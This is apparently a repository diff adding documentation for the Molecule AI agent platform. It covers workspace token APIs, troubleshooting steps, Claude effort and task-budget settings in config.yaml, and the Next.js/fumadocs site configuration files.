Returns non-revoked tokens. Only metadata is returned — never the plaintext or hash.
```json
{
"tokens": [
{
"id": "uuid-of-token-row",
"prefix": "abc12345",
"created_at": "2026-04-16T12:00:00Z",
"last_used_at": "2026-04-16T15:30:00Z"
}
],
"count": 1
}
```
### Create token
```bash
POST /workspaces/:id/tokens
Authorization: Bearer <token>
```
Mints a new token. The plaintext is returned **exactly once** — save it immediately.
```json
{
"auth_token": "dGhpcyBpcyBhIHRlc3QgdG9rZW4...",
"workspace_id": "ws-uuid",
"message": "Save this token now — it cannot be retrieved again."
}
```
### Revoke token
```bash
DELETE /workspaces/:id/tokens/:tokenId
Authorization: Bearer <token>
```
Revokes a specific token by its database ID (from the List response).
```json
{
"status": "revoked"
}
```
Returns 404 if the token doesn't exist, belongs to a different workspace, or
is already revoked.
## Token rotation
To rotate credentials without downtime:
1. **Create** a new token: `POST /workspaces/:id/tokens`
2. **Update** your agent to use the new token
3. **Verify** the new token works (check `last_used_at` in List)
4. **Revoke** the old token: `DELETE /workspaces/:id/tokens/:oldTokenId`
## Bootstrap — getting your first token
The first token is issued during workspace registration:
```bash
# 1. Create workspace
curl -X POST http://localhost:8080/workspaces \
-H "Content-Type: application/json" \
-d '{"name": "My Agent", "tier": 2}'
# 2. Register (returns auth_token)
curl -X POST http://localhost:8080/registry/register \
-H "Content-Type: application/json" \
-d '{"workspace_id": "<id>", "url": "http://...", "agent_card": {...}}'
```
For local development, the test-token endpoint is also available (disabled in production):
```bash
curl http://localhost:8080/admin/workspaces/<id>/test-token
```
## Security properties
| Property | Detail |
|---|---|
| Entropy | 256-bit (32 random bytes, base64url-encoded) |
| Storage | sha256 hash only — plaintext never persisted |
| Scope | Per-workspace — token A cannot auth workspace B |
| Display | Shown once at creation, not recoverable |
| Prefix | First 8 characters stored for log correlation |
| Expiration | None — tokens are permanent until revoked |
| Auto-revoke | All tokens revoked when workspace is deleted |

View File

@ -0,0 +1,164 @@
---
title: Troubleshooting
description: Common issues and how to fix them.
---
## Workspace Stuck in "Provisioning"
A workspace that stays in `provisioning` for more than 30 seconds usually indicates a container startup failure.
**Steps to diagnose:**
1. Check Docker logs for the workspace container:
```bash
docker logs <container-id>
```
2. Verify the workspace image exists locally:
```bash
docker images | grep workspace-template
```
3. Check tier resource limits -- the container may be OOM-killed on start. Review `TIER2_MEMORY_MB` / `TIER3_MEMORY_MB` / `TIER4_MEMORY_MB` values.
4. Ensure the platform can reach the Docker daemon (Docker Desktop must be running).
## 401 Unauthorized on API Calls
Bearer tokens can expire or be revoked. Workspace tokens are also auto-revoked when a workspace is deleted.
**Resolution:**
- For workspace-scoped endpoints, mint a new token:
```bash
# Development/staging only (hidden when MOLECULE_ENV=production)
curl http://localhost:8080/admin/workspaces/:id/test-token
```
- For admin endpoints, verify your token is still valid against a known-good endpoint like `GET /health`.
- Legacy workspaces (created before Phase 30.1) are grandfathered and do not require tokens on heartbeat/update-card routes.
## WebSocket Shows "Reconnecting"
The canvas WebSocket connection (`/ws`) drops and retries.
**Common causes:**
- `CORS_ORIGINS` does not include your domain -- the WebSocket upgrade is rejected. Add your origin to the comma-separated list.
- A reverse proxy or firewall is terminating the long-lived connection. Ensure WebSocket upgrade headers are forwarded.
- The platform process crashed or restarted. Check platform logs.
**Verify connectivity:**
```bash
# Quick check that the WS endpoint is reachable
curl -i -N \
-H "Connection: Upgrade" \
-H "Upgrade: websocket" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Key: dGVzdA==" \
http://localhost:8080/ws
```
## Agent Not Responding to A2A
When one agent cannot reach another via the A2A proxy (`POST /workspaces/:id/a2a`), check communication rules.
**The `CanCommunicate` access check allows:**
- Same workspace (self-call)
- Siblings (same parent)
- Root-level siblings (both have no parent)
- Parent to child or child to parent
**Everything else is denied.** If two agents need to communicate, they must be in the same subtree.
**Also verify:**
- The target workspace is `online` (not `paused`, `offline`, or `provisioning`)
- The target's heartbeat is fresh (Redis TTL has not expired)
- The caller includes `X-Workspace-ID` and `Authorization: Bearer <token>` headers
## Schedule Not Firing
Cron schedules are managed by the platform scheduler subsystem.
**Checklist:**
- Verify the cron expression is valid (standard 5-field cron syntax)
- Confirm the workspace is `online` -- paused workspaces skip all schedules
- Check if the schedule was `skipped` due to concurrency: the scheduler skips when `active_tasks > 0`. Review schedule history:
```
GET /workspaces/:id/schedules/:scheduleId/history
```
- Inspect `GET /admin/liveness` to ensure the scheduler subsystem is alive (age should be under 60 seconds)
## Channel Test Fails
Social channel integrations (Telegram, Slack, etc.) can fail for several reasons.
**Diagnose:**
- Verify the bot token is correct and has not been revoked by the platform provider
- Check the allowlist config in the channel's JSONB settings -- messages from non-allowlisted chats are silently dropped
- Ensure the webhook URL is registered with the external platform:
```
POST /webhooks/:type
```
This is the endpoint the external platform (Telegram, Slack) should send events to.
- Test the connection explicitly:
```
POST /workspaces/:id/channels/:channelId/test
```
## Migration Crash on Boot
The platform runs all `*.up.sql` migrations on every startup (there is no `schema_migrations` tracking table yet).
**Common issues:**
- Migrations must be idempotent (`CREATE TABLE IF NOT EXISTS`, `ALTER TABLE ... IF NOT EXISTS`). If a migration lacks this guard, the second boot fails.
- Before PR #212, the migration runner did not filter `.down.sql` files, causing tables to be dropped on every boot. Ensure you are running a platform version that includes this fix.
- If you see errors about duplicate columns or tables, the migration is not idempotent. Patch the `.up.sql` file to add `IF NOT EXISTS` guards.
## Canvas Blank or 502 on Tenant Deploy
In tenant mode (`platform/Dockerfile.tenant`), the Go server proxies canvas requests.
**Verify:**
- `CANVAS_PROXY_URL` is set and points to the running Next.js process inside the container
- Both the Go server and the Node.js process are running (check container logs for both)
- The Next.js build completed successfully during `docker build`
## Plugin Install Timeout
Large plugins or slow network connections can exceed the default fetch deadline.
**Adjust limits:**
| Variable | Default | Description |
|----------|---------|-------------|
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Increase for large or remote plugins |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` (100 MiB) | Increase if the plugin tree exceeds 100 MiB |
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` (64 KiB) | Increase if the install request body is large |
## Memory or Disk Usage Growing
Activity logs and structure events accumulate over time.
**Tune retention:**
- `ACTIVITY_RETENTION_DAYS` (default `7`) -- reduce to 3 or even 1 for high-traffic deployments
- `ACTIVITY_CLEANUP_INTERVAL_HOURS` (default `6`) -- reduce to run cleanup more frequently
- Monitor the `activity_logs` and `structure_events` tables directly if disk usage is a concern:
```sql
SELECT pg_size_pretty(pg_total_relation_size('activity_logs'));
SELECT pg_size_pretty(pg_total_relation_size('structure_events'));
```
## Container Health Detection
If workspaces go offline unexpectedly (e.g., Docker Desktop crash), three layers detect the failure:
1. **Passive (Redis TTL):** 60-second heartbeat key expires, liveness monitor triggers auto-restart
2. **Proactive (Health Sweep):** Docker API polled every 15 seconds, catches dead containers faster than TTL expiry
3. **Reactive (A2A Proxy):** On connection error to a workspace, checks `provisioner.IsRunning()` and triggers immediate offline + restart
If none of these are catching a dead container, check `GET /admin/liveness` to verify the health sweep and liveness monitor subsystems are running.

View File

@ -1,3 +1,6 @@
---
title: "Provisioning Workspaces on Fly Machines (CONTAINER_BACKEND=flyio)"
---
# Provisioning Workspaces on Fly Machines (CONTAINER_BACKEND=flyio)
Molecule AI can provision agent workspaces on [Fly Machines](https://fly.io/docs/machines/) instead of local Docker containers. When `CONTAINER_BACKEND=flyio` is set, every `POST /workspaces` creates a Fly Machine and boots the workspace agent inside it — with tier-based resource limits, env-var injection, and A2A registration handled automatically. The platform manages the workspace (lifecycle, auth, routing); Fly manages the machine it runs on.

View File

@ -1,3 +1,6 @@
---
title: "Running a Gemini CLI Workspace on Molecule AI"
---
# Running a Gemini CLI Workspace on Molecule AI
Molecule AI now ships a `gemini-cli` runtime adapter alongside the existing `claude-code` adapter. This tutorial walks you from zero to a running Gemini agent workspace in under five minutes.

View File

@ -1,3 +1,6 @@
---
title: "Running a Google ADK Workspace on Molecule AI"
---
# Running a Google ADK Workspace on Molecule AI
Google's Agent Development Kit (ADK) is now a first-class runtime on Molecule AI. This tutorial walks you from zero to a running ADK agent workspace — one that persists per-conversation session state and sits alongside your Claude Code and Gemini CLI workers in the same A2A network.

View File

@ -1,3 +1,6 @@
---
title: "Hermes Multi-Provider Dispatch: Native Anthropic, Gemini, and Multi-Turn History"
---
# Hermes Multi-Provider Dispatch: Native Anthropic, Gemini, and Multi-Turn History
Hermes is Molecule AI's inference router. Out of the box it proxies every model through an OpenAI-compatible shim. That works for plain text, but the shim does format translation on every round-trip — and it gets the Gemini message format wrong (Gemini expects `role: "model"` and a `parts: [{text}]` wrapper; the shim passes `role: "assistant"` and a flat string). It also flattens multi-turn conversations into a single user blob, losing role attribution across turns.

View File

@ -1,3 +1,6 @@
---
title: "Connecting an AI Agent to Lark / Feishu"
---
# Connecting an AI Agent to Lark / Feishu
Molecule AI's Lark channel adapter (shipped in #480) lets any workspace agent

View File

@ -1,3 +1,6 @@
---
title: "Register a Remote Agent on Molecule AI"
---
# Register a Remote Agent on Molecule AI
Remote agents let you connect AI agents running on *any* infrastructure — your laptop, a cloud VM, a CI/CD pipeline, or an on-premise server — to a single Molecule AI canvas. Your agent keeps running wherever it lives; the canvas gives you fleet-wide visibility, secret management, and cross-network A2A messaging from one place.

View File

@ -0,0 +1,166 @@
---
title: Workspace Configuration
description: Configure workspaces via config.yaml — runtime, model, tier, and Claude-specific settings including effort levels and task budget for Claude Opus 4.7.
---
import { Callout } from 'fumadocs-ui/components/callout';
# Workspace Configuration
Every Molecule AI workspace is backed by a `config.yaml` file. The **Config tab** in the canvas lets you edit this file through a structured form or in raw YAML mode. Changes take effect on the next workspace restart.
---
## Opening the Config tab
1. Click any workspace node on the canvas to open its sidebar
2. Select the **Config** tab
3. Edit fields in the form view, or toggle **Raw YAML** in the top-right to edit `config.yaml` directly
4. Click **Save** to write the file, or **Save & Restart** to apply changes immediately
---
## Claude Settings
The **Claude Settings** section of the Config tab exposes two primitives from the Claude Opus 4.7 API: **effort level** and **task budget**. These control how much reasoning work Claude does per turn — trading cost and latency for output quality.
<Callout type="info">
**Availability:** Claude Settings are only shown for workspaces running `runtime: claude-code` or using a model whose name includes `claude` or `anthropic`. The section is hidden for other runtimes and models.
</Callout>
The section is collapsed by default. Click **Claude Settings** to expand it.
---
## Effort levels
The **Effort** dropdown sets `output_config.effort` on the Claude Messages API call for every turn in this workspace.
| Value | Label | What it does | When to use |
|---|---|---|---|
| *(unset)* | — model default — | No `effort` field sent; Claude uses its built-in default | Everyday tasks where you want Claude to decide |
| `low` | low | Minimal reasoning steps; fastest response, lowest cost | Quick lookups, simple rewrites, high-throughput pipelines where latency matters |
| `medium` | medium | Balanced reasoning; Claude's typical quality for most tasks | General coding, writing, Q&A — a good starting point |
| `high` | high | More deliberate reasoning; higher quality, higher cost | Code review, architecture decisions, nuanced analysis |
| `xhigh` | xhigh (extended thinking) | **Activates extended thinking.** Claude works through the problem step-by-step before producing a final answer | Complex multi-step problems, hard debugging, long-range planning |
| `max` | max — absolute ceiling | Maximum possible effort; extended thinking at full depth | Research-grade reasoning, competitive benchmarks, correctness-critical tasks where cost is not a constraint |
### Tradeoffs
Higher effort levels improve output quality at the cost of latency and token spend:
- **Cost** scales roughly with reasoning depth. `max` can produce significantly more tokens than `low` on the same prompt.
- **Latency** increases with effort because Claude takes more reasoning steps before responding.
- **Quality** gains are most pronounced on tasks that require multi-step planning or where incorrect reasoning compounds (code generation, analysis, math).
For most workspaces, leaving effort **unset** or at **medium** is the right default. Move to `high` or above for specialist worker agents that handle tasks where errors are expensive — a security auditor, an architect, a final reviewer.
<Callout type="warn">
`xhigh` and `max` activate **extended thinking**, which is only available on **Claude Opus 4.7** and later. Using these levels with earlier models or other providers will return an API error.
</Callout>
---
## Task budget
The **Task Budget** field sets a token ceiling on how much thinking work Claude is allowed to do per turn. It maps to `output_config.task_budget.total` in the Messages API.
| Field | Type | Default | Minimum |
|---|---|---|---|
| `task_budget` | integer (tokens) | 0 (unset) | 20,000 when set |
**0 means unset** — no `task_budget` field is sent and Claude uses its own internal limit.
When set to a non-zero value, Claude will not exceed that many tokens of thinking/reasoning per turn. This lets you cap spend on a per-workspace basis without changing the effort level.
### When task budget applies
Task budget only has an effect when:
1. The workspace is running `runtime: claude-code` or a `claude`/`anthropic` model
2. The beta header `task-budgets-2026-03-13` is enabled (see [Beta header](#beta-header-requirement) below)
3. The effort level is `xhigh` or `max` (extended thinking must be active for the budget to be exercised)
Setting a `task_budget` on a `low`/`medium`/`high` effort workspace is harmless — it will be sent but has no practical effect without extended thinking active.
### Guidance
- **20,000 tokens** is the beta minimum. Values below this are ignored by the API.
- **50,000100,000 tokens** covers most complex coding and analysis tasks.
- **200,000+ tokens** is appropriate for research-grade or competitive-benchmark workloads.
- A tighter budget reduces cost on `xhigh`/`max` workspaces but may truncate reasoning on very hard problems. Watch your workspace metrics and adjust if you see quality regressions.
<Callout type="info">
**Executor wiring — coming in the next release.** The Config tab writes `effort` and `task_budget` to `config.yaml` today (PRs #639 and #654). The workspace executor that reads these values and passes them to the Claude SDK is tracked on the workspace-template side and will ship in the next release. Until that lands, the config is stored and visible but does not yet affect inference.
</Callout>
---
## config.yaml reference
Both fields serialize as top-level keys in `config.yaml`:
```yaml title="config.yaml — effort + task_budget examples"
name: Senior Reviewer
runtime: claude-code
model: anthropic:claude-opus-4-7
role: |
You are a senior engineer performing code review. Be thorough.
tier: 3
# Claude Settings
effort: high
task_budget: 0 # 0 = unset; omitted from API call
```
```yaml title="config.yaml — extended thinking at a fixed budget"
name: Architect
runtime: claude-code
model: anthropic:claude-opus-4-7
role: |
You design systems. Think deeply before recommending an architecture.
tier: 3
effort: xhigh
task_budget: 80000 # cap thinking at 80k tokens per turn
```
```yaml title="config.yaml — max effort, no budget cap"
name: Research Agent
runtime: claude-code
model: anthropic:claude-opus-4-7
role: |
You conduct research. Quality is the only constraint.
tier: 4
effort: max
# task_budget omitted — no ceiling on reasoning depth
```
When `task_budget` is `0`, `toYaml()` omits it from the file entirely — the field only appears in `config.yaml` when it holds a positive value.
---
## Beta header requirement
The `task_budget` feature requires the Anthropic API beta header:
```
anthropic-beta: task-budgets-2026-03-13
```
This header is added automatically by the workspace executor when `task_budget > 0` is present in `config.yaml`. You do not need to set it manually in your workspace config — it is an implementation detail of the executor, not a user-configurable option.
<Callout type="warn">
If you call the Anthropic Messages API directly (outside of a Molecule AI workspace), you must include `anthropic-beta: task-budgets-2026-03-13` in your request headers for `output_config.task_budget` to take effect. Omitting it causes the parameter to be silently ignored.
</Callout>
---
## See also
- [Concepts — Workspaces](/docs/concepts#workspaces) — workspace primitives overview
- [Org Template](/docs/org-template) — deploy effort/task_budget settings across an entire team via `org.yaml`
- [Observability](/docs/observability) — monitor token usage per workspace to tune your budget settings
- [API Reference — POST /workspaces](/docs/api-reference#post-workspaces)
- [Claude Opus 4.7 — Anthropic docs](https://docs.anthropic.com) — upstream reference for `output_config`

7
lib/source.ts Normal file
View File

@ -0,0 +1,7 @@
import { docs } from '@/.source/server';
import { loader } from 'fumadocs-core/source';
export const source = loader({
baseUrl: '/docs',
source: docs.toFumadocsSource(),
});

9
mdx-components.tsx Normal file
View File

@ -0,0 +1,9 @@
import defaultMdxComponents from 'fumadocs-ui/mdx';
import type { MDXComponents } from 'mdx/types';
export function getMDXComponents(components?: MDXComponents): MDXComponents {
return {
...defaultMdxComponents,
...components,
};
}

10
next.config.mjs Normal file
View File

@ -0,0 +1,10 @@
import { createMDX } from 'fumadocs-mdx/next';
const withMDX = createMDX();
/** @type {import('next').NextConfig} */
const config = {
reactStrictMode: true,
};
export default withMDX(config);

5625
package-lock.json generated Normal file

File diff suppressed because it is too large Load Diff

31
package.json Normal file
View File

@ -0,0 +1,31 @@
{
"name": "molecule-docs",
"version": "0.1.0",
"private": true,
"description": "Molecule AI documentation site — doc.moleculesai.app",
"scripts": {
"build": "next build",
"dev": "next dev",
"start": "next start",
"postinstall": "fumadocs-mdx",
"lint": "next lint"
},
"dependencies": {
"fumadocs-core": "^16.7.16",
"fumadocs-mdx": "^14.3.0",
"fumadocs-ui": "^16.7.16",
"next": "^16.2.4",
"react": "^19.2.5",
"react-dom": "^19.2.5"
},
"devDependencies": {
"@tailwindcss/postcss": "^4.2.2",
"@types/mdx": "^2.0.13",
"@types/node": "^22.0.0",
"@types/react": "^19.2.14",
"@types/react-dom": "^19.2.3",
"postcss": "^8.5.10",
"tailwindcss": "^4.2.2",
"typescript": "^5.6.3"
}
}

5
postcss.config.mjs Normal file
View File

@ -0,0 +1,5 @@
export default {
plugins: {
'@tailwindcss/postcss': {},
},
};

11
source.config.ts Normal file
View File

@ -0,0 +1,11 @@
import { defineConfig, defineDocs } from 'fumadocs-mdx/config';
export const docs = defineDocs({
dir: 'content/docs',
});
export default defineConfig({
mdxOptions: {
// Add remark/rehype plugins here as needed.
},
});

41
tsconfig.json Normal file
View File

@ -0,0 +1,41 @@
{
"compilerOptions": {
"target": "ES2022",
"lib": [
"dom",
"dom.iterable",
"esnext"
],
"allowJs": true,
"skipLibCheck": true,
"strict": true,
"noEmit": true,
"esModuleInterop": true,
"module": "esnext",
"moduleResolution": "Bundler",
"resolveJsonModule": true,
"isolatedModules": true,
"jsx": "react-jsx",
"incremental": true,
"plugins": [
{
"name": "next"
}
],
"paths": {
"@/*": [
"./*"
]
}
},
"include": [
"next-env.d.ts",
"**/*.ts",
"**/*.tsx",
".next/types/**/*.ts",
".next/dev/types/**/*.ts"
],
"exclude": [
"node_modules"
]
}